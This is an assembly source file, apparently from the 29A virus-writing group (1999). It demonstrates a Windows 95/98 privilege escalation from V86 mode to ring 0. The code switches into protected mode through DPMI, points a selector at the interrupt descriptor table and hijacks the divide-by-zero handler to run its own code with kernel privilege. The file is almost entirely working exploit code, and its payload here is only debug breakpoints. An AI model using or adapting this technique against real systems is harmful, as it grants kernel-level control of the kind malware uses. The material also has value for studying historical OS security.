
;                                V86 -> RING0

; this program should be executed under Win95/98
; developed under win98

; 1. start in V86, exec int3
; 2. go to PROT16/RING3 using DPMI, exec int3
; 3. go to PROT32/RING0 using DPMI/IDT hack, exec int3
; 4. back to DOS

;                                           (c) Z0MBiE/29A -- March 22, 1999

                        model   tiny
                        p386
                        locals  __
                        jumps
                        codeseg

                        org     100h
start:

                        mov     ax, 1600h       ; windows running?
                        int     2fh
                        cmp     al, 4           ; win95/98 ?
                        jne     __exit

                        int 3                   ; V86

                        lea     sp, endofstack  ; set own stack

                        mov     ah, 4ah         ; resize our memory block
                        mov     bx, memory
                        int     21h

                        mov     ax, 1687h       ; DPMI - installation check
                        int     2fh
                        or      ax, ax
                        jnz     __exit
                        ; ES:DI = DPMI mode-switch entry point
                        ; SI=memory(in par.) needed for DPMI private data

                        push    es              ; init DPMI initproc
                        push    di
                        pop     dpmicall

                        mov     ah, 48h         ; allocate memory
                        mov     bx, si          ; for DPMI private data
                        int     21h
                        jc      __exit
                        mov     es, ax

                        xor     ax, ax  ; flags: bit0=0 -> 16-bit program
                        call    dpmicall
                        jc      __exit
                        ; now in protected mode (16-bit, ring3)

                        int 3                   ; PROT16/R3

                        sidt    idtr            ; read IDTR

                        mov     ax, 6           ; save (get&push) ES.base
                        mov     bx, es
                        int     31h
                        push    cx
                        push    dx

                        mov     ax, 7           ; set ES.base
                        mov     bx, es
                        push    idtr_base  ; CX:DX=newnase=IDTR.base
                        pop     dx
                        pop     cx
                        int     31h

 ; by default ES points to PSP and ES.limit is 0FFh,
 ; so we can increase it a little w/o problems

 ; DPMI host is big madafucka, it dont allows you to set selectorlimit >= 2GB

                        mov     ax, 8           ; set ES.limit
                        mov     bx, es
                        mov     cx, 0           ; CX:DX=newlimit=maxIDTlimit
                        mov     dx, 256*8-1
                        int     31h

                        mov     ax, 0006h       ; get CS.base into CX:DX
                        mov     bx, cs
                        int     31h

                        add     dx, offset __ring0 ;calc lin. addr of __ring0
                        adc     cx, 0           ; [BUGFIX] was: dx
                        push    cx
                        push    dx
                        pop     ebp

                        xchg    bp, es:[0]              ; INT00 <--> __ring0
                        rol     ebp, 16
                        xchg    bp, es:[6]

                        xor     dx, dx
                        xor     cx, cx
                        div     cx     ;  call INT 00

                        xchg    bp, es:[6]              ; INT00 <--> __ring0
                        rol     ebp, 16
                        xchg    bp, es:[0]

                        mov     ax, 7           ; restore(pop&set) ES.base
                        mov     bx, es
                        pop     dx
                        pop     cx
                        int     31h

__exit:                 mov     ax, 4c00h       ; exit
                        int     21h

__ring0:                int 3                   ; PROT32/R0

                        inc     cx   ; inc ecx (!)
                        iret

; ---------------------------------------------------------------------------

dpmicall                dd      ?

idtr                    label   fword
idtr_limit              dw      ?
idtr_base               dd      ?

                        even
                        db      1024 dup (?)
endofstack:

memory                  equ     ($-start+256+15)/16

                        end     start
